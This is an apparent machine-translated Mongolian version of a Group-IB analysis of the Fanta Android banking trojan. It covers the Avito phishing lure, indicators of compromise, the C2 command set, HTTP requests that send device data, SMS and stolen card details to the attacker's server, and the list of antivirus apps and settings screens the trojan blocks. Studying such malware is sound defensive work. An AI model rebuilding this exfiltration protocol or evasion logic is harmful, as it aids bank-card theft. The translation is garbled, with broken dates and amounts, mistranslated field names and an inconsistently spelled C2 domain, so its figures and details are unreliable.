🥇Leisya, Fanta: хуучин Android Trojan-ийн шинэ тактикууд

Нэг өдөр та Avito дээр ямар нэгэн зүйл зарахыг хүсч байгаа бөгөөд бүтээгдэхүүнийхээ нарийвчилсан тайлбарыг (жишээлбэл, RAM модуль) нийтэлснээр та дараах мессежийг хүлээн авах болно.

Холбоосыг нээвэл аз жаргалтай, амжилттай худалдагч танд худалдан авалт хийгдсэн тухай мэдэгдэх гэмгүй хуудас гарч ирнэ.

Та "Үргэлжлүүлэх" товчийг дарсны дараа дүрс тэмдэгтэй, итгэл төрүүлсэн нэртэй APK файл таны Андройд төхөөрөмжид татагдах болно. Та ямар нэг шалтгааны улмаас AccessibilityService эрх хүссэн програм суулгасан, дараа нь хэд хэдэн цонх гарч ирэн, хурдан алга болж, ... Ингээд л болоо.

Та үлдэгдлээ шалгах гэж очсон ч ямар нэг шалтгааны улмаас таны банкны програм дахин картын мэдээллийг асууж байна. Мэдээллийг оруулсны дараа ямар нэг аймшигтай зүйл тохиолдох болно: зарим шалтгааны улмаас таны данснаас мөнгө алга болж эхэлдэг. Та асуудлыг шийдэхийг оролдож байгаа боловч таны утас эсэргүүцэж байна: "Буцах" болон "Нүүр" товчлууруудыг дарж, унтрахгүй бөгөөд ямар ч аюулгүй байдлын арга хэмжээг идэвхжүүлэхийг зөвшөөрдөггүй. Үүний үр дүнд та мөнгөгүй болж, бараагаа аваагүй, эргэлзэж, гайхаж байна: юу болсон бэ?

Хариулт нь энгийн: та Flexnet гэр бүлийн гишүүн Android Trojan Fanta-ийн хохирогч болсон. Энэ яаж болсон бэ? Одоо тайлбарлая.

Зохиогчид: Андрей Половинкин, хортой програмын шинжилгээний бага мэргэжилтэн, Иван Писарев, хортой програмын шинжилгээний мэргэжилтэн.

Зарим статистик

Android троянуудын Flexnet гэр бүл анх 2015 онд танигдсан. Үйл ажиллагааны нэлээд урт хугацаанд гэр бүл хэд хэдэн дэд зүйл болж өргөжсөн: Фанта, Лимебот, Липтон гэх мэт. Троян болон түүнтэй холбоотой дэд бүтэц зогсохгүй байна: түгээлтийн шинэ үр дүнтэй схемүүд боловсруулагдаж байна - манай тохиолдолд тодорхой хэрэглэгч-худалдагч руу чиглэсэн өндөр чанартай фишинг хуудсууд, Трояны хөгжүүлэгчид моод чиг хандлагыг дагаж мөрддөг. вирус бичих - халдвартай төхөөрөмжөөс мөнгө илүү үр дүнтэй хулгайлах, хамгаалах механизмыг тойрч гарах боломжийг олгодог шинэ функцийг нэмж оруулав.

Энэ нийтлэлд дурдсан кампанит ажил нь ОХУ-ын хэрэглэгчдэд зориулагдсан бөгөөд Украинд цөөн тооны халдвар авсан төхөөрөмж бүртгэгдсэн бол Казахстан, Беларусь улсад үүнээс ч бага байна.

Хэдийгээр Flexnet нь Android Trojan-ийн талбарт 4 жил гаруй болж байгаа бөгөөд олон судлаачид нарийвчлан судалсан ч энэ нь сайн хэвээр байна. 2019 оны 35-р сараас эхлэн хохирлын хэмжээ 2015 сая гаруй рубль болж байгаа бөгөөд энэ нь зөвхөн Орос дахь кампанит ажилд зориулагдсан болно. XNUMX онд энэхүү Android Trojan-ийн янз бүрийн хувилбаруудыг газар доорх форумууд дээр зарсан бөгөөд эндээс дэлгэрэнгүй тайлбар бүхий трояны эх кодыг олж болно. Энэ нь дэлхий дээрх хохирлын статистик илүү гайхалтай гэсэн үг юм. Тийм хөгшин хүний хувьд муу үзүүлэлт биш биз дээ?

Борлуулалтаас эхлээд хууран мэхлэлт хүртэл

Avito зар сурталчилгаа байршуулах интернет үйлчилгээний фишинг хуудасны өмнө танилцуулсан дэлгэцийн агшингаас харахад энэ нь тодорхой хохирогчдод зориулагдсан болно. Халдагчид Авитогийн задлан шинжлэлийн аль нэгийг ашигладаг бөгөөд энэ нь худалдагчийн утасны дугаар, нэр, бүтээгдэхүүний тайлбарыг гаргаж авдаг. Хуудсыг өргөжүүлж, APK файлыг бэлтгэсний дараа хохирогчид түүний нэр, түүний бүтээгдэхүүний тодорхойлолт, бүтээгдэхүүний "борлуулалтаас" авсан дүнг агуулсан фишинг хуудасны холбоосыг бичсэн SMS илгээдэг. Товчлуур дээр дарснаар хэрэглэгч хортой APK файлыг хүлээн авна - Fanta.

shcet491[.]ru домайныг судлахад энэ нь Hostinger-ийн DNS серверүүдэд хуваарилагдсан болохыг харуулсан:

ns1.hostinger.ru
ns2.hostinger.ru
ns3.hostinger.ru
ns4.hostinger.ru

Домэйн бүсийн файл нь 31.220.23[.]236, 31.220.23[.]243, 31.220.23[.]235 IP хаяг руу чиглэсэн оруулгуудыг агуулна. Гэсэн хэдий ч домэйны үндсэн нөөцийн бүртгэл (A бичлэг) нь 178.132.1[.]240 IP хаягтай серверийг заадаг.

IP хаяг 178.132.1[.]240 нь Нидерландад байрладаг бөгөөд хостонд харьяалагддаг. WorldStream. 31.220.23[.]235, 31.220.23[.]236 болон 31.220.23[.]243 IP хаягууд нь Их Британид байрладаг бөгөөд HOSTINGER хуваалцсан хостинг серверт харьяалагддаг. Дуу хураагуур болгон ашигладаг openprov-ru. Дараах домэйнууд мөн 178.132.1[.]240 IP хаягаар шийдэгдсэн:

sdelka-ru[.]ru
tovar-av[.]ru
ав-товар[.]ру
ru-sdelka[.]ru
shcet382[.]ru
sdelka221[.]ru
sdelka211[.]ru
vyplata437[.]ru
viplata291[.]ru
perevod273[.]ru
perevod901[.]ru

Дараах форматтай холбоосууд бараг бүх домэйноос боломжтой гэдгийг тэмдэглэх нь зүйтэй.

http://(www.){0,1}<%domain%>/[0-9]{7}

Энэ загвар нь SMS мессежийн холбоосыг агуулдаг. Түүхэн мэдээлэлд үндэслэн нэг домэйн нь дээр дурдсан хэв маягийн хэд хэдэн холбоостой тохирч байгаа нь тогтоогдсон бөгөөд энэ нь Трояныг хэд хэдэн хохирогчдод түгээхэд нэг домэйн ашигласан болохыг харуулж байна.

Жаахан урагшилцгаая: SMS-ийн холбоосоор татаж авсан троян нь хаягийг ашигладаг onsedseddohap[.]клуб. Энэ домэйн 2019-03-12-нд бүртгэгдсэн бөгөөд 2019-04-29-ний өдрөөс эхлэн APK програмууд энэ домайнтай харилцаж эхэлсэн. VirusTotal-аас авсан мэдээлэлд үндэслэн нийт 109 программ энэ сервертэй харилцсан байна. Домэйн нь өөрөө IP хаягаар шийдэгдсэн 217.23.14[.]27, Нидерландад байрладаг бөгөөд хостын эзэмшдэг WorldStream. Дуу хураагуур болгон ашигладаг нэрийн хуудас. Домэйнуудыг мөн энэ IP хаягаар шийдсэн bad-racoon[.]клуб (2018-09-25-аас эхлэн) болон bad-racoon[.]амьд (2018-10-25-ны өдрөөс эхлэн). Домэйнтэй bad-racoon[.]клуб 80 гаруй APK файлтай харилцсан bad-racoon[.]амьд - 100 гаруй.

Ерөнхийдөө халдлага дараах байдлаар явагдана.

Фантагийн тагны доор юу байгаа вэ?

Бусад олон Андройд троянуудын нэгэн адил Fanta нь SMS мессеж уншиж, илгээх, USSD хүсэлт гаргах, програмын (түүний дотор банкны цонх) дээр өөрийн цонхыг харуулах чадвартай. Гэсэн хэдий ч энэ гэр бүлийн функциональ арсенал ирсэн: Fanta ашиглаж эхэлсэн Хандалтын үйлчилгээ янз бүрийн зорилгоор: бусад програмын мэдэгдлийн агуулгыг унших, халдвар авсан төхөөрөмж дээрх трояныг илрүүлэх, ажиллуулахыг зогсоох гэх мэт. Fanta нь 4.4-ээс доошгүй Android-ийн бүх хувилбар дээр ажилладаг. Энэ нийтлэлд бид дараах Fanta дээжийг нарийвчлан авч үзэх болно.

MD5: 0826bd11b2c130c4c8ac137e395ac2d4
SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Гаргасны дараа шууд

Троян ажиллуулсны дараа тэр даруй дүрсээ нуудаг. Халдвар авсан төхөөрөмжийн нэр жагсаалтад байхгүй тохиолдолд л програм ажиллах боломжтой.

Android_x86
VirtualBox
Nexus 5X(бухын толгой)
Nexus 5(сахлын хутга)

Энэхүү шалгалтыг Трояны үндсэн үйлчилгээнд хийдэг. Үндсэн үйлчилгээ. Анх удаа ажиллуулсны дараа програмын тохиргооны параметрүүдийг анхдагч утгуудад тохируулдаг (тохиргооны өгөгдлийг хадгалах формат, тэдгээрийн утгыг дараа хэлэлцэх болно), шинэ халдвар авсан төхөөрөмжийг хяналтын сервер дээр бүртгэдэг. Мессежийн төрөл бүхий HTTP POST хүсэлтийг сервер рүү илгээх болно бүртгүүлэх_бот халдвар авсан төхөөрөмжийн талаарх мэдээлэл (Android хувилбар, IMEI, утасны дугаар, операторын нэр, оператор бүртгэгдсэн улсын код). Хаяг нь хяналтын серверийн үүрэг гүйцэтгэдэг hXXp://onuseseddohap[.]club/controller.php. Үүний хариуд сервер талбаруудыг агуулсан мессеж илгээдэг bot_id, bot_pwd, сервер - програм нь эдгээр утгыг CnC серверийн параметр болгон хадгалдаг. Параметр сервер Хэрэв талбар хүлээн аваагүй бол нэмэлт: Fanta бүртгэлийн хаягийг ашигладаг - hXXp://onuseseddohap[.]club/controller.php. CnC хаягийг өөрчлөх функцийг хоёр асуудлыг шийдвэрлэхэд ашиглаж болно: ачааллыг хэд хэдэн серверийн хооронд жигд хуваарилах (хэрэв олон тооны халдвар авсан төхөөрөмж байгаа бол оновчгүй вэб серверийн ачаалал өндөр байж болно), мөн ашиглах. CnC серверүүдийн аль нэг нь доголдсон тохиолдолд өөр сервер .

Хэрэв хүсэлтийг илгээх явцад алдаа гарвал троян 20 секундын дараа бүртгэлийн үйл явцыг давтах болно.

Төхөөрөмжийг амжилттай бүртгүүлсний дараа Fanta хэрэглэгчдэд дараах мессежийг харуулах болно.

Анхаарах зүйл: үйлчилгээ дуудагдсан Системийн аюулгүй байдал — Трояны үйлчилгээний нэр, товчийг дарсны дараа OK Халдвар авсан төхөөрөмжийн хүртээмжийн тохиргоо бүхий цонх нээгдэх бөгөөд хэрэглэгч хортой үйлчилгээнд нэвтрэх эрхийг олгох ёстой.

Хэрэглэгч асаалттай болмогц Хандалтын үйлчилгээ, Fanta нь програмын цонхны агуулга болон тэдгээрт гүйцэтгэсэн үйлдлүүдэд хандах эрх олж авдаг:

Хандалтын эрхийг авсны дараа троян нь администраторын эрх, мэдэгдлийг унших эрхийг хүсдэг.

AccessibilityService-ийг ашиглан програм нь товчлуурын даралтыг дуурайдаг бөгөөд ингэснээр шаардлагатай бүх эрхийг өөртөө өгдөг.

Fanta нь тохиргооны өгөгдөл болон халдвар авсан төхөөрөмжийн талаар цуглуулсан мэдээллийг хадгалахад шаардлагатай хэд хэдэн өгөгдлийн сангийн жишээг (үүнийг дараа нь тайлбарлах болно) үүсгэдэг. Цуглуулсан мэдээллийг илгээхийн тулд троян нь мэдээллийн сангаас талбаруудыг татаж авах, хяналтын серверээс тушаал хүлээн авах зорилготой давтагдах даалгаврыг үүсгэдэг. CnC-д нэвтрэх интервалыг Android хувилбараас хамааран тохируулна: 5.1-ийн хувьд интервал 10 секунд, эс тэгвээс 60 секунд байна.

Командыг хүлээн авахын тулд Фанта хүсэлт гаргадаг Даалгавар авах удирдлагын сервер рүү. Хариуд нь CnC дараах командуудын аль нэгийг илгээж болно.

баг	Тайлбар
0	SMS мессеж илгээх
1	Утасны дуудлага эсвэл USSD команд хийнэ үү
2	Параметрийг шинэчилнэ завсарлага
3	Параметрийг шинэчилнэ хайх
6	Параметрийг шинэчилнэ smsManager
9	SMS мессеж цуглуулж эхлээрэй
11	Утсаа үйлдвэрийн тохиргоонд дахин тохируулна уу
12	Харилцах цонх үүсгэх бүртгэлийг идэвхжүүлэх/идэвхгүй болгох

Fanta мөн банкны 70 программ, хурдан төлбөрийн систем, цахим хэтэвчээс мэдэгдэл цуглуулж мэдээллийн санд хадгалдаг.

Тохиргооны параметрүүдийг хадгалах

Тохиргооны параметрүүдийг хадгалахын тулд Fanta нь Android платформд зориулсан стандарт аргыг ашигладаг. Тохиргоо-файлууд. Тохиргоонууд нь нэртэй файлд хадгалагдах болно тохиргоо. Хадгалсан параметрүүдийн тайлбарыг доорх хүснэгтэд үзүүлэв.

нэр	Өгөгдмөл утга	Боломжит утгууд	Тайлбар
id	0	Бүхэл тоо	Бот ID
сервер	hXXp://onuseseddohap[.]club/	URL	Серверийн хаягийг хянах
ширхэг	-	String	Серверийн нууц үг
завсарлага	20	Бүхэл тоо	Цагийн интервал. Дараах ажлуудыг хэр удаан хойшлуулахыг заана. Илгээсэн SMS мессежийн статусын талаар хүсэлт илгээх үед Удирдлагын серверээс шинэ тушаал хүлээн авч байна
хайх	бүх	бүгд/утасны дугаар	Хэрэв талбар нь мөртэй тэнцүү бол бүх буюу утасны дугаар, дараа нь хүлээн авсан SMS мессежийг программ саатуулж, хэрэглэгчдэд харуулахгүй
smsManager	0	0/1	Програмыг үндсэн SMS хүлээн авагч болгон идэвхжүүлэх/идэвхгүй болгох
ReadDialog	хуурамч	Үнэн худал	Үйл явдлын бүртгэлийг идэвхжүүлэх/идэвхгүй болгох AccessibilityEvent

Fanta мөн файлыг ашигладаг smsManager:

нэр	Өгөгдмөл утга	Боломжит утгууд	Тайлбар
pckg	-	String	Ашигласан SMS мессежийн менежерийн нэр

Өгөгдлийн сантай харилцах

Ашиглалтын явцад Троян нь хоёр мэдээллийн санг ашигладаг. Өгөгдлийн санг нэрлэсэн a утаснаас цуглуулсан янз бүрийн мэдээллийг хадгалахад ашигладаг. Хоёрдахь мэдээллийн санг нэрлэсэн fanta.db Банкны картын талаарх мэдээллийг цуглуулах зорилготой фишинг цонхыг үүсгэх үүрэгтэй тохиргоог хадгалахад ашигладаг.

Троян нь мэдээллийн санг ашигладаг а цуглуулсан мэдээллийг хадгалах, үйлдлээ бүртгэх. Өгөгдлийг хүснэгтэд хадгалдаг бүртгэлүүд. Хүснэгт үүсгэхийн тулд дараах SQL асуулгыг ашиглана уу.

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Мэдээллийн сан нь дараахь мэдээллийг агуулна.

1. Халдвар авсан төхөөрөмж ажиллаж эхэлснийг мессежээр бүртгэх Утас асаалттай!

2. Хэрэглээний мэдэгдэл. Зурвас дараах загварын дагуу үүсгэгдэнэ.

(<%App Name%>)<%Title%>: <%Notification text%>

3. Трояны үүсгэсэн фишинг маягтуудын банкны картын өгөгдөл. Параметр VIEW_NAME дараах зүйлсийн аль нэг нь байж болно:

AliExpress
Авито
Google Play
Төрөл бүрийн <%Програмын нэр%>

Зурвас дараах форматаар нэвтэрсэн байна:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Ирж буй / гарах SMS мессежүүд:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Формат дахь харилцах цонхыг үүсгэдэг багцын тухай мэдээлэл:

(<%Package name%>)<%Package information%>

Жишээ хүснэгт бүртгэлүүд:

Fanta-ийн нэг функц нь банкны картын талаархи мэдээллийг цуглуулах явдал юм. Мэдээлэл цуглуулах нь банкны програмуудыг нээх үед фишинг цонх үүсгэх замаар хийгддэг. Троян нь фишинг хийх цонхыг нэг л удаа үүсгэдэг. Хэрэглэгчдэд цонхыг харуулсан мэдээллийг хүснэгтэд хадгална тохиргоо мэдээллийн санд fanta.db. Өгөгдлийн сан үүсгэхийн тулд дараах SQL асуулгыг ашиглана уу.

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Бүх хүснэгтийн талбарууд тохиргоо анхдагчаар 1 болгож эхлүүлсэн (фишинг цонх үүсгэх). Хэрэглэгч өгөгдлөө оруулсны дараа утгыг 0 болгож тохируулна. Хүснэгтийн талбаруудын жишээ тохиргоо:

нэвтэрч болно — талбар нь банкны өргөдлийг нээх үед маягтыг харуулах үүрэгтэй
эхний_банк - ашиглагдахгүй байгаа
can_avito — талбар нь Avito програмыг нээх үед маягтыг харуулах үүрэгтэй
can_ali - талбар нь Aliexpress програмыг нээх үед маягтыг харуулах үүрэгтэй
өөр_чадна - жагсаалтаас аливаа програмыг нээх үед талбар нь маягтыг харуулах үүрэгтэй. Yula, Pandao, Drom Auto, Wallet. Хөнгөлөлтийн болон урамшууллын картууд, Aviasales, Booking, Trivago
can_card — талбар нь нээх үед маягтыг харуулах үүрэгтэй Google Play

Удирдлагын сервертэй харилцах

Удирдлагын сервертэй сүлжээний харилцан үйлчлэл нь HTTP протоколоор явагддаг. Сүлжээтэй ажиллахын тулд Fanta алдартай Retrofit номын санг ашигладаг. Хүсэлтийг дараах хаягаар илгээдэг: hXXp://onuseseddohap[.]club/controller.php. Сервер дээр бүртгүүлэх үед серверийн хаягийг өөрчилж болно. Күүки серверээс хариу илгээж болно. Fanta серверт дараах хүсэлтийг гаргадаг:

Хяналтын сервер дээрх роботыг анх удаа ажиллуулсны дараа бүртгэнэ. Халдвар авсан төхөөрөмжийн талаарх дараах мэдээллийг сервер рүү илгээнэ.
· Күүки — серверээс хүлээн авсан күүки (өгөгдмөл утга нь хоосон мөр)
· горим - мөрийн тогтмол бүртгүүлэх_бот
· угтвар - бүхэл тоон тогтмол 2
· version_sdk - дараах загварын дагуу бүрдэв. <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· IMEI - Халдвар авсан төхөөрөмжийн IMEI
· улс — операторын бүртгэлтэй улсын код, ISO форматтай
· тоо - утасны дугаар
· Оператор - операторын нэр

Сервер рүү илгээсэн хүсэлтийн жишээ:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
```
Хүсэлтийн хариуд сервер дараах параметрүүдийг агуулсан JSON объектыг буцаах ёстой.
· bot_id - халдвар авсан төхөөрөмжийн ID. Хэрэв bot_id 0-тэй тэнцүү бол Fanta хүсэлтийг дахин гүйцэтгэх болно.
bot_pwd - серверийн нууц үг.
сервер - серверийн хаягийг хянах. Нэмэлт параметр. Хэрэв параметрийг заагаагүй бол програмд хадгалсан хаягийг ашиглана.

Жишээ JSON объект:
```
{
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}
```

Серверээс тушаал хүлээн авах хүсэлт. Дараах өгөгдлийг сервер рүү илгээнэ.
· Күүки - серверээс хүлээн авсан күүки
· тендер - хүсэлтийг илгээх үед хүлээн авсан халдвартай төхөөрөмжийн ID бүртгүүлэх_бот
· ширхэг - серверийн нууц үг
· divice_admin — талбар нь администраторын эрхийг авсан эсэхийг тодорхойлно. Хэрэв администраторын эрхийг авсан бол талбар нь тэнцүү байна 1, өөрөөр 0
· Хүртээмжтэй — Хүртээмжийн үйлчилгээний үйл ажиллагааны байдал. Хэрэв үйлчилгээг эхлүүлсэн бол үнэ цэнэ нь байна 1, өөрөөр 0
· SMSManager — SMS хүлээн авах өгөгдмөл програмын хувьд Trojan идэвхжсэн эсэхийг харуулна
· дэлгэц — дэлгэц ямар төлөвт байгааг харуулна. Утгыг тохируулах болно 1, хэрэв дэлгэц асаалттай бол, өөрөөр хэлбэл 0;

Сервер рүү илгээсэн хүсэлтийн жишээ:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>
```
Тушаалаас хамааран сервер өөр өөр параметр бүхий JSON объектыг буцааж өгч болно:

· баг SMS мессеж илгээх: Параметрүүд нь утасны дугаар, SMS мессежийн текст, илгээж буй мессежийн ID-г агуулна. Тодорхойлогч нь сервер рүү мессеж илгээх үед ашиглагддаг setSmsStatus.
```
{
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}
```
· баг Утасны дуудлага эсвэл USSD команд хийнэ үү: Утасны дугаар эсвэл тушаал нь хариултын хэсэгт ирдэг.
```
{
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}
```
· баг Интервалын параметрийг өөрчлөх.
```
{
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}
```
· баг Intercept параметрийг өөрчлөх.
```
{
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}
```
· баг SmsManager талбарыг өөрчлөх.
```
{
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}
```
· баг Халдвар авсан төхөөрөмжөөс SMS мессеж цуглуулах.
```
{
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}
```
· баг Утсаа үйлдвэрийн тохиргоонд дахин тохируулна уу:
```
{
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}
```
· баг ReadDialog параметрийг өөрчлөх.
```
{
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}
```

Мессежийн төрлийг илгээж байна setSmsStatus. Энэ хүсэлт нь тушаалыг гүйцэтгэсний дараа хийгддэг SMS мессеж илгээх. Хүсэлт дараах байдлаар харагдаж байна.

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

Өгөгдлийн сангийн агуулгыг байршуулж байна. Хүсэлт бүрт нэг мөрийг дамжуулдаг. Дараах өгөгдлийг сервер рүү илгээнэ.
· Күүки - серверээс хүлээн авсан күүки
· горим - мөрийн тогтмол SetSaveInboxSms
· тендер - хүсэлтийг илгээх үед хүлээн авсан халдвартай төхөөрөмжийн ID бүртгүүлэх_бот
· текст - одоогийн мэдээллийн сангийн бүртгэл дэх текст (талбар d ширээнээс бүртгэлүүд мэдээллийн санд а)
· тоо - одоогийн мэдээллийн сангийн бичлэгийн нэр (талбар p ширээнээс бүртгэлүүд мэдээллийн санд а)
· sms_mode - бүхэл тоо (талбар m ширээнээс бүртгэлүүд мэдээллийн санд а)

Хүсэлт дараах байдлаар харагдаж байна.
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>
```
Хэрэв сервер рүү амжилттай илгээсэн бол мөрийг хүснэгтээс устгах болно. Серверээс буцаасан JSON объектын жишээ:
```
{
    "response":[],
    "status":"ok"
}
```

AccessibilityService-тэй харилцах

Хөгжлийн бэрхшээлтэй хүмүүст Android төхөөрөмжийг ашиглахад хялбар болгох үүднээс AccessibilityService-ийг хэрэгжүүлсэн. Ихэнх тохиолдолд програмтай харилцахын тулд бие махбодийн харилцан үйлчлэл шаардлагатай байдаг. AccessibilityService нь тэдгээрийг программын дагуу хийх боломжийг танд олгоно. Fanta нь энэ үйлчилгээг ашиглан банкны программуудад хуурамч цонх үүсгэж, хэрэглэгчдийг системийн тохиргоо болон зарим программыг нээхээс сэргийлдэг.

AccessibilityService-ийн функцийг ашиглан Троян нь халдвар авсан төхөөрөмжийн дэлгэц дээрх элементүүдийн өөрчлөлтийг хянадаг. Өмнө дурьдсанчлан, Fanta тохиргоо нь харилцах цонхны үйлдлүүдийг бүртгэх үүрэгтэй параметрийг агуулдаг. ReadDialog. Хэрэв энэ параметрийг тохируулсан бол үйл явдлыг өдөөсөн багцын нэр, тайлбарын талаарх мэдээлэл мэдээллийн санд нэмэгдэх болно. Троян нь үйл явдал эхлэхэд дараах үйлдлүүдийг гүйцэтгэдэг.

Дараах тохиолдолд арын болон гэрийн товчлуурыг дарахад дуурайлган хийдэг.
· хэрэв хэрэглэгч төхөөрөмжөө дахин ачаалахыг хүсвэл
· хэрэв хэрэглэгч "Avito" програмыг устгах эсвэл нэвтрэх эрхийг өөрчлөхийг хүсвэл
· хэрэв хуудсан дээр "Avito" програмын тухай дурдсан бол
· Google Play Хамгаалалтын програмыг нээх үед
· AccessibilityService тохиргоотой хуудсыг нээх үед
· Системийн аюулгүй байдлын харилцах цонх гарч ирэх үед
· "Бусад програм дээр зурах" тохиргоотой хуудсыг нээх үед
· "Програм" хуудсыг нээхдээ "Сэргээх ба дахин тохируулах", "Өгөгдөл дахин тохируулах", "Тохиргоог дахин тохируулах", "Хөгжүүлэгчийн самбар", "Тусгай. боломж”, “Тусгай боломж”, “Тусгай эрх”
· хэрэв үйл явдлыг тодорхой програмууд үүсгэсэн бол.

Хэрэглээний жагсаалт
- Android
- Мастер Lite
- Цэвэр мастер
- x86 CPU-д зориулсан Clean Master
- Meizu програмын зөвшөөрлийн менежмент
- MIUI аюулгүй байдал
- Цэвэр мастер - Антивирус, кэш, хог цэвэрлэгч
- Эцэг эхийн хяналт ба GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Вирус цэвэрлэгч, Антивирус, цэвэрлэгч (MAX Security)
- Mobile AntiVirus Security PRO
- Avast антивирус ба үнэгүй хамгаалалт 2019
- Гар утасны аюулгүй байдлын MegaFon
- Xperia-д зориулсан AVG хамгаалалт
- Гар утасны аюулгүй байдал
- Malwarebytes Антивирус ба Хамгаалалт
- Android 2019-д зориулсан антивирус
- Хамгаалалтын мастер - Антивирус, VPN, AppLock, Booster
- Huawei таблет системийн менежерт зориулсан AVG антивирус
- Samsung-ийн хүртээмж
- Samsung ухаалаг менежер
- Аюулгүй байдлын мастер
- Хурд өргөлт
- Доктор Веб
- Dr.Web аюулгүй байдлын орон зай
- Dr.Web Mobile Control Center
- Dr.Web Security Space Life
- Dr.Web Mobile Control Center
- Антивирус ба гар утасны аюулгүй байдал
- Kaspersky Internet Security: Антивирус ба хамгаалалт
- Kaspersky Battery Life: Saver & Booster
- Kaspersky Endpoint Security - хамгаалалт ба менежмент
- AVG Antivirus үнэгүй 2019 – Android-д зориулсан хамгаалалт
- Антивирусын Android
- Norton Mobile Security ба Антивирус
- Антивирус, галт хана, VPN, гар утасны хамгаалалт
- Гар утасны аюулгүй байдал: вирусны эсрэг, VPN, хулгайн хамгаалалт
- Android-д зориулсан антивирус
Хэрэв богино дугаар руу SMS мессеж илгээх үед зөвшөөрөл хүссэн бол Fanta нь чагт дээр дарж дуурайдаг. Сонголтыг санаарай ба товчлуур илгээх.
Таныг администраторын эрхийг Троянаас хасахыг оролдох үед энэ нь утасны дэлгэцийг түгждэг.
Шинэ админ нэмэхээс сэргийлнэ.
Хэрэв вирусны эсрэг програм dr.web аюул заналыг илрүүлсэн, Fanta товчлуурыг дарж дуурайлган хийдэг үл тоомсорлох.
Троян нь үйл явдлыг программ үүсгэсэн бол буцах болон нүүр товчийг дарахад дуурайлган хийдэг Samsung төхөөрөмжийн арчилгаа.
Fanta нь 30 орчим төрлийн интернет үйлчилгээний жагсаалтаас програм ажиллуулсан тохиолдолд банкны картын тухай мэдээлэл оруулах маягт бүхий фишинг цонхыг бий болгодог. Үүнд: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto гэх мэт.

Фишингийн маягтууд

Fanta нь халдвар авсан төхөөрөмж дээр ямар програм ажиллаж байгааг шинжилдэг. Хэрэв сонирхсон програм нээсэн бол троян нь бусад бүхний дээр фишинг хийх цонхыг харуулдаг бөгөөд энэ нь банкны картын мэдээллийг оруулах маягт юм. Хэрэглэгч дараах өгөгдлийг оруулах ёстой.
- Картны дугаар
- Картын хүчинтэй байх хугацаа
- CVV
- Карт эзэмшигчийн нэр (бүх банкны хувьд биш)
Ажиллаж буй програмаас хамааран фишинг хийх янз бүрийн цонхнууд харагдах болно. Тэдгээрийн заримын жишээг доор харуулав.

AliExpress:

Авито:

Зарим бусад хэрэглээний хувьд, жишээлбэл. Google Play Market, Aviasales, Pandao, Booking, Trivago:

Энэ үнэхээр ямар байсан

Өгүүллийн эхэнд дурдсан SMS мессежийг хүлээн авсан хүн нь азаар кибер аюулгүй байдлын мэргэжилтэн болж таарав. Тиймээс жинхэнэ, найруулагчийн бус хувилбар нь өмнөх хувилбараас ялгаатай: нэг хүн сонирхолтой SMS хүлээн авч, дараа нь Групп-IB Threat Hunting Intelligence багт өгсөн. Довтолгооны үр дүн нь энэ нийтлэл юм. Аз жаргалтай төгсгөл, тийм үү? Гэсэн хэдий ч бүх түүхүүд тийм ч амжилттай төгсдөггүй бөгөөд таныхыг мөнгө алдсан найруулагч шиг харагдуулахгүйн тулд ихэнх тохиолдолд дараахь урт хугацааны дүрмийг баримтлах нь хангалттай юм.
